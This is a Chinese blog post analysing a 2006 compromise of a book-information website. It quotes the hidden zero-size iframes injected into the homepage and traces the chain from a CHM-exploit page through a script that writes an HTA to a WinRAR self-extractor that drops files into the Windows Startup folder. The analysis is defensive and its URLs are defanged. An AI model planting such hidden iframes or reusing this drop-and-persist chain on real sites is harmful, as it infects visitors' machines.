某图书信息网被加入恶意代码

r囧r小猫 2024-02-06 00:38 32阅读 0赞

**endurer** 原创

2006-11-08 第**1**版

该图书信息网首页首部被加入代码：

＜iframe src=hxxp://www\*.book\*\*\*info\*\*.com.cn/change.htm width=0 height=0 frameborder=0＞＜/iframe＞

**change.htm** 的内容为：  
/--------  
＜html＞  
＜iframe src="hxxp://www\*.book\*\*\*info\*\*.com.cn/ind/caohui.htm" width="0" height="0" frameborder="0"＞＜/iframe＞

＜iframe src="hxxp://hk.myblog.yahoo.com/f\*4-stu\*\*dent\*" width="0" height="0" frameborder="0"＞＜/iframe＞

＜iframe src="hxxp://blog.q\*\*oo\*z\*a.hk/tmcf4student/" width="0" height="0" frameborder="0"＞＜/iframe＞  
＜/html＞  
\--------/

**hxxp://www\*.book\*\*\*info\*\*.com.cn/ind/caohui.htm** 的内容为加入多余空格的利用CHM漏洞的恶意代码，会下载2个文件：

**1、caohui.gif** 为加入多余空格的脚本程序，文件长度为 117 KB (120,006 字节)，功能为:创建并运行c:/caohui.hta。  
c:/caohui.hta的功能为：  
1）从IE临时文件夹中寻找caohui.css，复制为C:/soft.exe并运行。  
2）创建文件c:/wins.bat来删除自己。

**caohui.css** 其实是一个WinRAR制作的自解压文件，文件长度为 20,006 字节，解压脚本为：  
/--------  
包含; 下列註解包含自解檔指令碼命令

Path=C:/Documents and Settings/All Users/「開始」功能表/程式集/啟動/  
SavePath  
Silent=1  
Overwrite=1  
\--------/

把文件解压到C:/Documents and Settings/All Users/「開始」功能表/程式集/啟動/ 下……

这对使用简体中文版的Windows用户不起作用罢？^\_^！

包中的文件为 **dnserror.htm**，文件长度为 3,260 字节，其中包含代码：

/--------  
＜iframe src="hxxp://home.tmcss.edu.hk/~t\*m\*c-02\*\*016/change.htm" width="0" height="0" frameborder="0"＞＜/iframe＞  
\--------/